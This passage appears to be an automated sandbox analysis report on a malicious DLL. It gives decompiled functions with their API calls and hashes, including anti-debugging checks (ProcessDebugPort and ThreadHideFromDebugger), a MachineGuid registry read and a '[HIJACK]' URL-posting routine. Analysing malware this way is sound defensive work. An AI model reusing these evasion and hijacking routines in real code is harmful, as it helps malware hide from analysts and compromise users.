                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                  • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                                  • API String ID: 3677997916-880526231
                                                                                                                                                                  • Opcode ID: 47a5e7846db4febb3ca94b54af4193357214023853d4f51c5508a224df730e19
                                                                                                                                                                  • Instruction ID: 036869a64e7b96092babc19efb2470d9694155ef05369fbbd3590e376cbd9c8c
                                                                                                                                                                  • Opcode Fuzzy Hash: 47a5e7846db4febb3ca94b54af4193357214023853d4f51c5508a224df730e19
                                                                                                                                                                  • Instruction Fuzzy Hash: 99F01275600208FBEB10DFA0DC85F9D77B9EB08700F604148FA14AB280DB75DB81DB65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                                  			E100118DF(void* __ebx, void* __esi) {
                                                                                                                                                                  				void* _t1;
                                                                                                                                                                  				long _t5;
                                                                                                                                                                  				void* _t9;
                                                                                                                                                                  				void* _t11;
                                                                                                                                                                  				void* _t15;
                                                                                                                                                                  
                                                                                                                                                                  				_t9 = __ebx;
                                                                                                                                                                  				_t1 = TlsGetValue( *0x10334594);
                                                                                                                                                                  				_t16 = _t1;
                                                                                                                                                                  				if(_t1 != 0) {
                                                                                                                                                                  					_push( *0x10334590);
                                                                                                                                                                  					_t11 =  *(TlsGetValue( *0x10334594))();
                                                                                                                                                                  				}
                                                                                                                                                                  				_pop(_t15);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( *0x10334590);
                                                                                                                                                                  				 *((intOrPtr*)(E1001158A( *0x10335480)))();
                                                                                                                                                                  				_push(_t11);
                                                                                                                                                                  				L100117AC(_t9, _t11, _t15, _t16);
                                                                                                                                                                  				_t5 =  *0x10334594; // 0x20
                                                                                                                                                                  				if(_t5 != 0xffffffff) {
                                                                                                                                                                  					return TlsSetValue(_t5, 0);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t5;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 100118EC
                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 100118FE
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 10011913
                                                                                                                                                                  • TlsSetValue.KERNEL32(00000020,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331550,0000000C,1000EC47), ref: 1001192F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$__decode_pointer
                                                                                                                                                                  • String ID: tj
                                                                                                                                                                  • API String ID: 3389472636-3491506833
                                                                                                                                                                  • Opcode ID: 0c7f06b116b2131f449bc60c8500541cc33991b08cb4f8d3606f4d7b1ebcba75
                                                                                                                                                                  • Instruction ID: 5ea32f06f5c113a557663da0afc6a555ab05ec8127c22f0ad06d45371975ea5c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0c7f06b116b2131f449bc60c8500541cc33991b08cb4f8d3606f4d7b1ebcba75
                                                                                                                                                                  • Instruction Fuzzy Hash: 25E06D3A800120AFFA059B759CC4B693F6AFBCA661F110111F12CDE0B2DE31ECA29A00
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E1001A000() {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				_Unknown_base(*)()* _v12;
                                                                                                                                                                  				struct HINSTANCE__* _v16;
                                                                                                                                                                  
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                                  				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                                  				// Information class 7 is ProcessDebugPort: a nonzero value in _v8 means a debugger is attached.
                                                                                                                                                                  				_v12(GetCurrentProcess(), 7,  &_v8, 4, 0);
                                                                                                                                                                  				return 0 | _v8 != 0x00000000;
                                                                                                                                                                  			}







                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 1001A012
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 1001A024
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 1001A037
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                                  • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                  • API String ID: 353374858-801751246
                                                                                                                                                                  • Opcode ID: 38e3ca949b96ec1f02b6c056c4686b534a5e8ee6be15c149bd05a26a226aa475
                                                                                                                                                                  • Instruction ID: 71e2acb23208394f78a226fd07bfd7a9a839184327190de95aec6d8225f51f41
                                                                                                                                                                  • Opcode Fuzzy Hash: 38e3ca949b96ec1f02b6c056c4686b534a5e8ee6be15c149bd05a26a226aa475
                                                                                                                                                                  • Instruction Fuzzy Hash: 4DF0A575D44208FFEB10EBE0DD8DB9DBBB8EB04201F614494EA15A6180EA746A49CB55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E10019DA0() {
                                                                                                                                                                  				_Unknown_base(*)()* _v8;
                                                                                                                                                                  				struct HINSTANCE__* _v12;
                                                                                                                                                                  
                                                                                                                                                                  				_v12 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                                  				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
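                                                                                                                                                                  				// Information class 0x11 is ThreadHideFromDebugger: debug events from this thread are no longer delivered to an attached debugger.
                                                                                                                                                                  				return _v8(GetCurrentThread(), 0x11, 0, 0);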
                                                                                                                                                                  			}





                                                                                                                                                                  0x10019db1
                                                                                                                                                                  0x10019dc3
                                                                                                                                                                  0x10019dd9

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Ntdll.dll,?,100207E1), ref: 10019DAB
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019DBD
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 10019DCC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCurrentLibraryLoadProcThread
                                                                                                                                                                  • String ID: Ntdll.dll$ZwSetInformationThread
                                                                                                                                                                  • API String ID: 903204110-1680533912
                                                                                                                                                                  • Opcode ID: 81fb8b46b22517918d6ec40a5a4b5af2fd6c90d3156655230c1d6776d8c37ca9
                                                                                                                                                                  • Instruction ID: ec36d98e740d09ce498d664616d1e94f1a85ab36ce5175e8c059281a5b49cb64
                                                                                                                                                                  • Opcode Fuzzy Hash: 81fb8b46b22517918d6ec40a5a4b5af2fd6c90d3156655230c1d6776d8c37ca9
                                                                                                                                                                  • Instruction Fuzzy Hash: 7FE0E674944208FBEF009BE09D8DB9CBB78EB04702FA14051FF05A6280DA715A454AA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E1001F500(void* _a4, char* _a8) {
                                                                                                                                                                  				char* _v8;
                                                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				struct _SYSTEMTIME _v32;
                                                                                                                                                                  				char* _v40;
                                                                                                                                                                  				char* _v44;
                                                                                                                                                                  				struct _FILETIME _v52;
                                                                                                                                                                  				char* _t43;
                                                                                                                                                                  
                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                  				_v40 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				if(RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16) == 0) {
                                                                                                                                                                  					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
                                                                                                                                                                  						// 0x7b2 = 1970: the SYSTEMTIME below is 1970-01-01 00:00:00, the Unix epoch.
                                                                                                                                                                  						_v32.wYear = 0x7b2;
                                                                                                                                                                  						_v32.wMonth = 1;
                                                                                                                                                                  						_v32.wDay = 1;
                                                                                                                                                                  						_v32.wHour = 0;
                                                                                                                                                                  						_v32.wMinute = 0;
                                                                                                                                                                  						_v32.wSecond = 0;
                                                                                                                                                                  						_v32.wMilliseconds = 0;
                                                                                                                                                                  						SystemTimeToFileTime( &_v32,  &_v52);
                                                                                                                                                                  						_t43 = _v8;
                                                                                                                                                                  						asm("sbb edx, [ebp-0x2c]");
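                                                                                                                                                                  						// The API list for this function resolves this call as __aulldiv: the key's last-write FILETIME minus the 1970 epoch, divided by 0x2710 (10000), converts 100-ns ticks to milliseconds.
                                                                                                                                                                  						_v44 = E1000F2F0(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);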
                                                                                                                                                                  						_v40 = _t43;
                                                                                                                                                                  					}
                                                                                                                                                                  					RegCloseKey(_v16);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v44;
                                                                                                                                                                  			}












                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000101,00000000), ref: 1001F52E
                                                                                                                                                                  • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F558
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F594
                                                                                                                                                                  • __aulldiv.LIBCMT ref: 1001F5AF
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1001F5BE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3147484438-0
                                                                                                                                                                  • Opcode ID: b7fd3d01d5ea90349a3a8d64e1f3cb3a0cb48ce308f43978e438b8e68c732dd2
                                                                                                                                                                  • Instruction ID: f30bdbee4ac12bde428f6f044f578bd3b240634cd6c104924fe674acfb2d543b
                                                                                                                                                                  • Opcode Fuzzy Hash: b7fd3d01d5ea90349a3a8d64e1f3cb3a0cb48ce308f43978e438b8e68c732dd2
                                                                                                                                                                  • Instruction Fuzzy Hash: 87210D75D10208ABEB00CFD4C898FEEB7B9FF48704F109148EA14BB290D7759A49CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E1001F430(char* _a4) {
                                                                                                                                                                  				struct _SYSTEMTIME _v20;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                                  				struct _FILETIME _v36;
                                                                                                                                                                  				struct _FILETIME _v44;
                                                                                                                                                                  				struct _FILETIME _v52;
                                                                                                                                                                  				struct _FILETIME _v60;
                                                                                                                                                                  				void* _v64;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t44;
                                                                                                                                                                  
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				if(PathFileExistsA(_a4) != 0) {
                                                                                                                                                                  					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
                                                                                                                                                                  					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
                                                                                                                                                                  						_v20.wYear = 0x7b2;
                                                                                                                                                                  						_v20.wMonth = 1;
                                                                                                                                                                  						_v20.wDay = 1;
                                                                                                                                                                  						_v20.wHour = 0;
                                                                                                                                                                  						_v20.wMinute = 0;
                                                                                                                                                                  						_v20.wSecond = 0;
                                                                                                                                                                  						_v20.wMilliseconds = 0;
                                                                                                                                                                  						SystemTimeToFileTime( &_v20,  &_v60);
                                                                                                                                                                  						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
                                                                                                                                                                  						asm("sbb eax, [ebp-0x34]");
                                                                                                                                                                  						_v28 = E1000F2F0(_t44, _v36.dwHighDateTime, 0x2710, 0);
                                                                                                                                                                  						_v24 = _t44;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v28;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 1001F448
                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F46C
                                                                                                                                                                  • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F48B
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F4C7
                                                                                                                                                                  • __aulldiv.LIBCMT ref: 1001F4E2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3038978132-0
                                                                                                                                                                  • Opcode ID: c1a897aad6c05bd8ab7d9b163dd1f078ef973958e7b535aac97c866858d62821
                                                                                                                                                                  • Instruction ID: 282c7306dc6b684cc064bb2559bb565ca804bda22c30e035a61ca1407b16c130
                                                                                                                                                                  • Opcode Fuzzy Hash: c1a897aad6c05bd8ab7d9b163dd1f078ef973958e7b535aac97c866858d62821
                                                                                                                                                                  • Instruction Fuzzy Hash: 4621EA75910208ABEB10DFD4D895FEEB7B8FF04704F108208E505BB290DB75A685CB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019390(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				void* _t17;
                                                                                                                                                                  				void* _t18;
                                                                                                                                                                  				void* _t19;
                                                                                                                                                                  				void* _t21;
                                                                                                                                                                  				void* _t25;
                                                                                                                                                                  				void* _t30;
                                                                                                                                                                  				void* _t38;
                                                                                                                                                                  				void* _t42;
                                                                                                                                                                  				void* _t44;
                                                                                                                                                                  				void* _t46;
                                                                                                                                                                  
                                                                                                                                                                  				_t38 = __edi;
                                                                                                                                                                  				_t30 = __ebx;
                                                                                                                                                                  				_t17 = E1000CAD0(_a4);
                                                                                                                                                                  				_t18 = E1000CAD0(_a8);
                                                                                                                                                                  				_t44 = _t42 + 8;
                                                                                                                                                                  				if(_t17 >= _t18) {
                                                                                                                                                                  					_v8 = _a4;
                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                  					while(1) {
                                                                                                                                                                  						_t19 = E1000CAD0(_a8);
                                                                                                                                                                  						_t21 = E1000CAD0(_a4);
                                                                                                                                                                  						_t46 = _t44 + 8;
                                                                                                                                                                  						if(_t19 + _v12 > _t21) {
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t25 = E1000E8FF(_t30, _a8, _t38, _v8, _a8, E1000CAD0(_a8));
                                                                                                                                                                  						_t44 = _t46 + 0x10;
                                                                                                                                                                  						if(_t25 != 0) {
                                                                                                                                                                  							_v12 = _v12 + 1;
                                                                                                                                                                  							_v8 = _v8 + 1;
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  						return 1;
                                                                                                                                                                  					}
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4218353326-0
                                                                                                                                                                  • Opcode ID: e838c8b0435b565fb9a53166a5dd30e01c929ba7b477388d88b0234cdaad13b2
                                                                                                                                                                  • Instruction ID: bf7a77dd80a6ed25a2450b96e81a1ff586a3e69a3a9db53e8abd92bbbbbe0b29
                                                                                                                                                                  • Opcode Fuzzy Hash: e838c8b0435b565fb9a53166a5dd30e01c929ba7b477388d88b0234cdaad13b2
                                                                                                                                                                  • Instruction Fuzzy Hash: DA113BB9E0020CA7EB10DFA8E841D9D77A4EB04294F148165FD0BDB305E531FE519792
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E1000EAC5(void* __ebx, void* __edi) {
                                                                                                                                                                  
                                                                                                                                                                  				E100115F6();
                                                                                                                                                                  				if(E10014911(1, 0x214) != __edi) {
                                                                                                                                                                  					_push(__esi);
                                                                                                                                                                  					_push( *0x10334590);
                                                                                                                                                                  					__eax = E1001158A( *0x10335480);
                                                                                                                                                                  					__eflags = __eax;
                                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                                  						_push(__esi);
                                                                                                                                                                  						__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                  						goto L1;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push(__edi);
                                                                                                                                                                  						_push(__esi);
                                                                                                                                                                  						__eax = E1001165D(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                  						__eax = GetCurrentThreadId();
                                                                                                                                                                  						__esi[1] = __esi[1] | 0xffffffff;
                                                                                                                                                                  						 *__esi = __eax;
                                                                                                                                                                  						0 = 1;
                                                                                                                                                                  						__eflags = 1;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0;
                                                                                                                                                                  			}




                                                                                                                                                                  APIs
                                                                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 1000EAC5
                                                                                                                                                                    • Part of subcall function 100115F6: TlsGetValue.KERNEL32(10011720), ref: 100115FC
                                                                                                                                                                    • Part of subcall function 100115F6: __decode_pointer.LIBCMT ref: 1001160C
                                                                                                                                                                    • Part of subcall function 100115F6: TlsSetValue.KERNEL32(00000000), ref: 10011619
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 1000EAD1
                                                                                                                                                                    • Part of subcall function 10014911: __calloc_impl.LIBCMT ref: 1001491F
                                                                                                                                                                    • Part of subcall function 10014911: Sleep.KERNEL32(00000000,10011746,00000001,00000214), ref: 10014936
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 1000EAEF
                                                                                                                                                                    • Part of subcall function 1001158A: TlsGetValue.KERNEL32(?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331550), ref: 10011597
                                                                                                                                                                    • Part of subcall function 1001158A: TlsGetValue.KERNEL32(00000005,?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001), ref: 100115AE
                                                                                                                                                                  • __initptd.LIBCMT ref: 1000EAFD
                                                                                                                                                                    • Part of subcall function 1001165D: GetModuleHandleA.KERNEL32(KERNEL32.DLL,103315D0,0000000C,1001176F,00000000,00000000), ref: 1001166E
                                                                                                                                                                    • Part of subcall function 1001165D: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10011697
                                                                                                                                                                    • Part of subcall function 1001165D: GetProcAddress.KERNEL32(?,DecodePointer), ref: 100116A7
                                                                                                                                                                    • Part of subcall function 1001165D: InterlockedIncrement.KERNEL32(10334658), ref: 100116C9
                                                                                                                                                                    • Part of subcall function 1001165D: ___addlocaleref.LIBCMT ref: 100116F0
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1000EB04
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1662683381-0
                                                                                                                                                                  • Opcode ID: 95b815981802653688cc0cebbafbd1d3d34d1eb17374ba65d4117c0aeae8b2e9
                                                                                                                                                                  • Instruction ID: 106076030708d108cc7be60c426ae776d5d8c147d49c5448cdaefb0738cd9b5f
                                                                                                                                                                  • Opcode Fuzzy Hash: 95b815981802653688cc0cebbafbd1d3d34d1eb17374ba65d4117c0aeae8b2e9
                                                                                                                                                                  • Instruction Fuzzy Hash: B5F02E37204252A9F328E7351C02C4F3784DF827F1721092DF157E80E1EE21D9815560
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E10022DFB(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                  				void* _t72;
                                                                                                                                                                  				void* _t73;
                                                                                                                                                                  				void* _t76;
                                                                                                                                                                  				void* _t110;
                                                                                                                                                                  				void* _t112;
                                                                                                                                                                  
                                                                                                                                                                  				L0:
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					L0:
                                                                                                                                                                  					_t109 = __esi;
                                                                                                                                                                  					_t108 = __edi;
                                                                                                                                                                  					_t77 = __ebx;
                                                                                                                                                                  					 *((intOrPtr*)(_t110 - 0x2c)) =  *((intOrPtr*)(_t110 - 0x2c)) + 1;
                                                                                                                                                                  					L1:
                                                                                                                                                                  					_t118 =  *((intOrPtr*)(_t110 - 0x2c)) - 6;
                                                                                                                                                                  					if( *((intOrPtr*)(_t110 - 0x2c)) <= 6) {
                                                                                                                                                                  						L2:
                                                                                                                                                                  						E100011C0(_t110 - 0x80, 0x10025cba);
                                                                                                                                                                  						 *((intOrPtr*)(_t110 - 0xe8)) = E10022710(__ebx, __edi, __esi, _t118, _t110 - 0xbc,  *((intOrPtr*)(_t110 - 0x2c)));
                                                                                                                                                                  						 *((intOrPtr*)(_t110 - 0xec)) =  *((intOrPtr*)(_t110 - 0xe8));
                                                                                                                                                                  						 *((char*)(_t110 - 4)) = 5;
                                                                                                                                                                  						E10001A70(_t110 - 0x80,  *((intOrPtr*)(_t110 - 0xec)));
                                                                                                                                                                  						 *((char*)(_t110 - 4)) = 4;
                                                                                                                                                                  						E100011A0(_t110 - 0xbc);
                                                                                                                                                                  						 *((intOrPtr*)(_t110 - 0xf0)) = E10001160(_t110 - 0xd8, _t118,  *((intOrPtr*)(_t110 + 0xc)));
                                                                                                                                                                  						 *((intOrPtr*)(_t110 - 0xf4)) =  *((intOrPtr*)(_t110 - 0xf0));
                                                                                                                                                                  						 *((char*)(_t110 - 4)) = 6;
                                                                                                                                                                  						E10001A90(_t110 - 0x80,  *((intOrPtr*)(_t110 - 0xf4)));
                                                                                                                                                                  						 *((char*)(_t110 - 4)) = 4;
                                                                                                                                                                  						E100011A0(_t110 - 0xd8);
                                                                                                                                                                  						_push(E100011E0(_t110 - 0x80));
                                                                                                                                                                  						_push(0x61);
                                                                                                                                                                  						_push("post_info");
                                                                                                                                                                  						E1001F230(__edi, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp"));
                                                                                                                                                                  						E100011C0(_t110 - 0x28, 0x10025cbb);
                                                                                                                                                                  						E100011C0(_t110 - 0x48, 0x10025cce);
                                                                                                                                                                  						_t72 = E10001200(_t110 - 0x64);
                                                                                                                                                                  						_t73 = E100011E0(_t110 - 0x64);
                                                                                                                                                                  						E10021C30(__ebx, __edi, __esi, _t118, 0, 0, 0, E100011E0(_t110 - 0x80), 2, 1, 0, _t73, _t72, 0, 0, 0, 0, 0, 0, _t110 - 0x28, _t110 - 0x48);
                                                                                                                                                                  						_t112 = _t112 + 0x60;
                                                                                                                                                                  						_t76 = E10001200(_t110 - 0x28);
                                                                                                                                                                  						_t119 = _t76;
                                                                                                                                                                  						if(_t76 == 0) {
                                                                                                                                                                  							L4:
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					L5:
                                                                                                                                                                  					_push( *((intOrPtr*)(_t110 - 0x84)));
                                                                                                                                                                  					E1000CA40(_t77, _t108, _t109, _t119);
                                                                                                                                                                  					E10001110( *((intOrPtr*)(_t110 + 8)), _t119, _t110 - 0x48);
                                                                                                                                                                  					 *(_t110 - 0xdc) =  *(_t110 - 0xdc) | 0x00000001;
                                                                                                                                                                  					 *((char*)(_t110 - 4)) = 3;
                                                                                                                                                                  					E100011A0(_t110 - 0x48);
                                                                                                                                                                  					 *((char*)(_t110 - 4)) = 1;
                                                                                                                                                                  					E100011A0(_t110 - 0x28);
                                                                                                                                                                  					 *((char*)(_t110 - 4)) = 0;
                                                                                                                                                                  					E100011A0(_t110 - 0x64);
